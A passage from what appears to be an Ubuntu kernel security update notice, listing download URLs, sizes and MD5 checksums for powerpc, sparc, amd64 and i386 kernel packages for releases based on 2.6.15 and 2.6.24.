e2a2a9c9c0a66e0f66e4971456becb07\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    13526 6393b9447870a049537c64f1da8c0984\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    84832 dafa241b2ba2792acc11ed92ebf58d8a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    52194 9d681e1cde559db52f919d9a75da2987\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    73908 1b9eea0eb286147c629a5eb6a737bf68\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    85844 9d8a5108c045be78f3aa16ec41863d49\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:     6624 c39e697a9b25473e791b7668df4798d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:     7064 02c208ead4772ebd6dfaa1ee19df56cf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    60376 b83d6031ce6298fd19869d5d29e3a0c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    70392 cbaee4dfd466a12dff0b9098baa8788d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   128550 e4821e65980d609ef08066b2780a485a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   157808 9a1b4e218e785ecef63b0406c5f9c8a5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   108038 b472765900eaa08cc2cc54a2ae26d907\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   126050 75623f4ca292e6d3fc2b6e00211f964b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    87304 2ff71c1735a777692a08170ed726345b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    93306 ee8b741bf1ee4f57a90da0ed2b6da7d8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:  2013972 dac2efef3ff9d6289b7309d57cb72745\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:  1988102 c8d45fc53efb2b9f324547fd06ae7409\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   104106 14ccbc627fb90ae558e79b3833e5ba6b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   115702 19934a14896949c68acbe6f4b6459b0a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    12738 31ecc1891237ac01baa6d70fa55b2ffa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    14444 a638ce85cd817ffcd0316b798067af0b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    39948 0fad0a28b3b61dbce21d2ab2d3e385ec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    41474 4c179c6570402716b5e16076ee359ff9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   149308 d381b35191480574c053f931f5d4b838\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   168034 937d9f0067d9c5b86f547355a759ce3a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    42272 9adfaeeaeec83a69f60bba08b9f7029e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    44880 8be844f59b2578d8b0b96df521ed2980\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   320284 ed49feb1ad11dbe9eaebdf8e3b55aa14\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   324712 00dc7e4c517a8e77dbdbcd472560fd07\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:    50478 90ae6fcda7578bfc42fb227db6ed4a16\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:     2362 81e28a5627bcd9793bdb3d7d66c808e0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:    40332 bba6454e4e7a730fc19a71e9f177591b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:   110530 ee2bc9880d4119adc01104c26f4c9b45\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:    41186 22e3751924678d62633868c319ec33bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:   104238 f5357492d5c611bd51c4724b1b955972\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:     7438 6e66a60e61009df9bc350cde8318fd0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:   149008 d39a3d71f7cdaa48f4603f0d40d7183d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:  1711722 024c561786c0bfc1f337cc46a1a99842\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-sparc64-smp_2.6.15-54.77_sparc.deb\n      Size/MD5:   772116 b88f78698771d7b662bd8f55da837860\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-sparc64_2.6.15-54.77_sparc.deb\n      Size/MD5:   771542 ade51cbe986056b296fc493d071add8f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54_2.6.15-54.77_sparc.deb\n      Size/MD5:  6963002 734ea162d7bdae6fa642fbb65fc4aefd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-sparc64-smp_2.6.15-54.77_sparc.deb\n      Size/MD5: 15009480 f11efad62b8121702c97f681aaeff50c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-sparc64_2.6.15-54.77_sparc.deb\n      Size/MD5: 14829506 72058abf59e768b6e7a962a0f1765772\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:     7422 0fa7e99c434b4c2e616b163473d2482d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:   248670 395da4afc2eea6417478e5b9df10eac9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:   212452 381c41cde8488c4b922e0d13250ac60d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:  1048468 d00527551222987b228c1b3a236b33fa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:  1481892 c2a73def45b9c272b0f1b16b24072f74\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:    10118 6c152d785d4130d9189dfc5562b2918d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:    40180 bfdd5a38c85c337948efc354d5b52b1b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:     9370 a6b288b0cddcba37aa113b6c6a82c1ac\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:    61482 f6d84c317c95ca51e4a3a961edd4afbc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:   163022 75d6fbd3830d3fa83a4a33087893230f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:    64010 b2c069e1a9ab296b69db1c9d9347fdb5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:  1235086 983bf44bbfed30448fc00b43e525a222\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:    59354 ce272f6264ab0b9731c489358ffae596\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:    37406 39fb3eb53208a1810ef284874296c3ac\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb\n      Size/MD5:   280076 7716ed5dd3c520a43c3774a4e3633047\n\nUpdated packages for Ubuntu 8.04 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-24.55.diff.gz\n      Size/MD5:  4767049 a3e6ddfbd5081bb6e7535fcde2a3f609\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-24.55.dsc\n      Size/MD5:     2219 ddc04a20e187b20a43a5cecc952e4b59\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz\n      Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-24.55_all.deb\n      Size/MD5:  4928644 067a5db90758e43f49badf44aadc2ae2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24_2.6.24-24.55_all.deb\n      Size/MD5:  8142948 27ced16bc9ee340f7d2e59c4d03d4175\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-24.55_all.deb\n      Size/MD5:    96898 a53b271582fb8cb0f8aa7a3e6ef32d02\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-24.55_all.deb\n      Size/MD5: 46978434 5338ae19db39ce537ea7f81fbdfc4a62\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:    28590 3b10ec843d4ca2b68122730e1a14b331\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:   224138 5ef7d9b5cad79f6e5b10f8a004ec5cf4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:    52646 d4bf1babe03ceacbe09131b76a14b9cd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:    40622 8e880c89feeb75ddcb97eff9a1d2fb3c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:    48658 639f3170e278823641666c3355710ce9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:    86268 b2ae6f9d0f3397ab9d56b5ee2604f176\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:    36310 1f5d7ef1723c827f6ec1727b3787f3a9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:   648378 1e2bb0cf23d1a130795cd9f745e76fe7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:   209694 0235e8c39f85c8c59e5d8992d2c4d3fa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:    39192 40b6ff3fb69584a473fd285329e2e2b2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:    67952 06997f3f9fd155b9d8fd19ed840a7f46\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:   145266 94a9d3bf11d07fda05ba8d37e488c75e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:   286678 5b1c737aa948d6e03fdc79cea2467968\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:  2128784 32fc2ee9b3e3e5fb2b1c8a2522acc991\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-generic_2.6.24-24.55_amd64.deb\n      Size/MD5:   671194 533f220e2ed87ae41437a2e46d1135bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-openvz_2.6.24-24.55_amd64.deb\n      Size/MD5:  1251290 0c12f1ec5d33bf9b98a2cf65411f0cf6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-rt_2.6.24-24.55_amd64.deb\n      Size/MD5:  1273382 3dd530222979fbc4a0ec5846be3daa2b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-server_2.6.24-24.55_amd64.deb\n      Size/MD5:   671242 608ed557543bc3b12872b8731ac5594c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-xen_2.6.24-24.55_amd64.deb\n      Size/MD5:  1082876 c87e898e14f6037d1e4ad8c2c9fbe726\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-generic_2.6.24-24.55_amd64.deb\n      Size/MD5: 17801664 16b23af9d06baf9c80b4ffc5b2ac8ce0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-server_2.6.24-24.55_amd64.deb\n      Size/MD5: 17771428 8122d12f5082445f9603d13335b83515\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-generic_2.6.24-24.55_amd64.deb\n      Size/MD5: 21014464 68b73490ad11f3343768b5c201c70b25\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-server_2.6.24-24.55_amd64.deb\n      Size/MD5: 21387618 3b1bee21e40c69175cd5d1d45c5bf353\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-24.55_amd64.deb\n      Size/MD5:   705286 db77b2afae66f80b6692bb8a19cc602e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:   263680 7f27a9bbc9cefe36cf9dc85d16423bc7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:   176350 b51e4026bc049983ebd216f31169a41e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:   253928 a60545ac2ad4d8cdaf08da09e555ad08\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:  1640052 b5d649f457aecfccea9ee1758b546bd9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:   143684 0290beaef1a4ae3e291e20c517b979cb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:   164328 9124879a405d861d756f6dbeb40485b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:   115838 6edbfc0f6d64e81778feec9bbe7d0388\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:    35062 34b4bfd673f5b69d6a66d357d53913e8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:    64396 8913719a5eb39424e244f3aa3923ad56\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:    69694 0a45f71737115cdcc8a8a7979bc9c01e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:    21592 1e5dfd4b78a18cbe0615bfe4e656241d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:     8618 3353256d9abc6aac3c8904247fad36a8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:    57178 34272f15a47eaead9a3bb5e8cabc99fe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:   102988 16f8a54269e7acfeec29642135518312\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:  1212082 7bfdf05b2a0e7a3e2a9bd69bfb74929a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:    45470 57609f5c992b83ab16b19cb8bdacff4a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:    12772 ddb48f6ed471562112661169d41c09c3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:   497808 bd328b4bfef64c9afaddaee236abdb91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb\n      Size/MD5:    74980 db1542ff52ce70a7fa58d678e70d1ab7\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-openvz_2.6.24-24.55_amd64.deb\n      Size/MD5: 19242994 1c7114da74f213cc5cdb9599ecf7233d\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-rt_2.6.24-24.55_amd64.deb\n      Size/MD5: 17890604 f7c54711409ec7c911b89a9e8d3cef47\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-xen_2.6.24-24.55_amd64.deb\n      Size/MD5: 18900390 a6502ae7ee82cf1393310e22903b2763\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    23682 1c7aab194616a471285a9d250127a835\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    26764 92a84719d2c4883b366d6d68d1820120\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   218684 eb3d8b92d6c4a48245724997a6121fc2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   220440 40b53586ca28797dc014b8f656cf4725\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    51932 80258fa2f467ec10a1ec94ba389a247e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    52062 d84d679039a1dcb7a7a6e2be9a11bc9a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    38324 ff2e0a017b7f58e42c276911d2b763ea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    39080 50426ae4e5c02d35e95c5351665417cb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    45866 27ce55188a7e0726ea19ac778c1b20bf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    46012 ec9111a5e17c2b7cf80a8ec9d7eb574e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    83200 c17e82497048c7e436642aa16a8b4177\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    83580 d683701699212dcc121fb6c59096a766\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    32396 2476d6800fd166d9923a3b25e7284e37\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    32674 15560eb3ad638e98cf61e9ba41f59040\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   637392 0fecf174e6f568e2c6c7dad168bc3841\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   655480 3296fe2e55062e3b5b4b39e79e2104c6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   209782 13517227a395e3b14e02c55a04d9b4a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   213588 e303705801fc9b3fb8f04b49c18f8d20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    46558 47c3d466e4f4e2725a11e60e8869d501\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    47578 3680b979071cb88973c8aa33f94f2037\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    62250 79aec11c8be1c769f018f94cbe9c1e42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:    63618 5f60fbf8b28c79d969bbda9f457e5761\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   130296 744b0747406ed2d6b4d57eac25a866ae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   136874 923a1fde2cf0625dd1a4de29e9738fac\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   278542 56184e755e1b37390051b10d66615d8e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb\n      Size/MD5:   277118 b273c46bbceb8d256b04295ea3f6bc5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-24-386-di_2.6.24-24.55_i386.udeb\n      Size/MD5:  2008816 96b6e6b4d202c7d4edcd9a4e9257e663\n    